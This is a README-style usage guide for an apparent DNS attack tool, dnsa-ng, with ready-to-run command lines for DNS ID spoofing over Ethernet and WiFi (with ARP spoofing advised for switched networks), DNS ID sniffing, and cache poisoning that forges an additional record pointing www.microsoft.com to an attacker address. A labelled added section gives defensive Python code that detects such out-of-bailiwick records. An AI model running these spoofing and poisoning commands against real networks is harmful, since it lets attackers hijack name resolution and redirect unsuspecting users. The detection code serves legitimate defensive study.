DNS ID Spoofing :
-----------------
[ If you want to use it on switched networks, you'll need a tool to do ARP spoofing. I recommend arp-sk (http://www.arp-sk.org), which is the greatest! ;) ]
	./dnsa-ng -m [raw4 or link] -1 -D the_FQDN_you_want_to_reply_to.org -S IP_TO_SEND -s HOST_TO_FOOL -i INTERFACE -t ether

Using Ethernet
==>	./dnsa-ng -m [raw4 or link] -1 -D www.the_one.org -S 1.2.3.4 -s 192.168.0.1 -i eth0 -t ether

Using WiFi : it captures 802.11 traffic using the monitor mode of the first card, and injects forged packets with another card which is associated with the AP.
In order to put your card in monitor mode, you can use "iwconfig [interface] mode monitor". Do not forget to use the same channel...
==>	./dnsa-ng -m [raw4 or link] -1 -D www.the_one.org -S 1.2.3.4 -s 192.168.0.1 -i ath0 -t wifi -I wlan0


DNS Sniffing (Needs to be improved) :
-----------------------------------
[ For the moment, it just sniffs DNS IDs, but doesn't do anything with them. We are currently working on prediction. ]
	./dnsa-ng -t ether -m [raw4 or link] -2 -s HOST_TO_SNIFF -w file_to_store_IDs

==>	./dnsa-ng -t ether -m [raw4 or link] -2 -s 192.168.0.1 -w IDs_of_192.168.0.1

DNS cache poisoning :
---------------------
	./dnsa-ng -t ether -m [raw4 or link] -3 -D the_host_IP_which_is_asked_for -S normal_host_IP -s DNS_server_which_is_doing_the_request -a host_in_additional_record -b ip_in_the_additional_record -i INTERFACE

==>	./dnsa-ng -t ether -m [raw4 or link] -3 -D hacker.pirate.org -S 100.101.102.103 -s 194.117.200.10 -a www.microsoft.com -b 1.2.3.4 -i eth0
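
Added example (not part of dnsa-ng or of the original README): the resolver-side bailiwick check that keeps an unrelated additional record such as the one above out of the cache, run over a constructed DNS response that reuses the names and addresses from the command above. The zone "pirate.org", the transaction ID, the TTL and every function name are assumptions of this example.

```python
import struct

def encode_name(name):
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\0"

def read_name(msg, off):
    """Decode a possibly compressed name; return (name, offset after it)."""
    labels, end, hops = [], None, 0
    while True:
        n = msg[off]
        if n & 0xC0 == 0xC0:                      # compression pointer
            end = off + 2 if end is None else end
            off = ((n & 0x3F) << 8) | msg[off + 1]
            hops += 1
            if hops > 16:                         # malformed: pointer loop
                raise ValueError("compression loop")
        elif n == 0:
            return ".".join(labels).lower(), (off + 1 if end is None else end)
        else:
            labels.append(msg[off + 1:off + 1 + n].decode("ascii", "replace"))
            off += 1 + n

def out_of_bailiwick(msg, zone):
    """Return (section, owner name, rdata) for every record outside `zone`."""
    zone = zone.lower().rstrip(".")
    _, _, qd, an, ns, ar = struct.unpack("!6H", msg[:12])
    off = 12
    for _ in range(qd):                           # skip the question section
        _, off = read_name(msg, off)
        off += 4
    flagged = []
    for section, count in (("answer", an), ("authority", ns), ("additional", ar)):
        for _ in range(count):
            name, off = read_name(msg, off)
            rtype, _, _, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
            rdata = msg[off + 10:off + 10 + rdlen]
            off += 10 + rdlen
            if name != zone and not name.endswith("." + zone):
                text = ".".join(map(str, rdata)) if rtype == 1 else rdata.hex()
                flagged.append((section, name, text))
    return flagged

def a_record(name, ip):
    return encode_name(name) + struct.pack("!HHIH", 1, 1, 60, 4) + bytes(map(int, ip.split(".")))

# Constructed sample: one question, one answer, one additional record.
SAMPLE = (struct.pack("!6H", 0x1234, 0x8400, 1, 1, 0, 1)
          + encode_name("hacker.pirate.org") + struct.pack("!HH", 1, 1)
          + a_record("hacker.pirate.org", "100.101.102.103")
          + a_record("www.microsoft.com", "1.2.3.4"))
```

Calling out_of_bailiwick(SAMPLE, "pirate.org") returns the single additional record for www.microsoft.com, which a resolver should discard rather than cache.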


--
If you need help, contact me : 
	Pierre BETOUIN
	pierre.betouin@security-labs.org
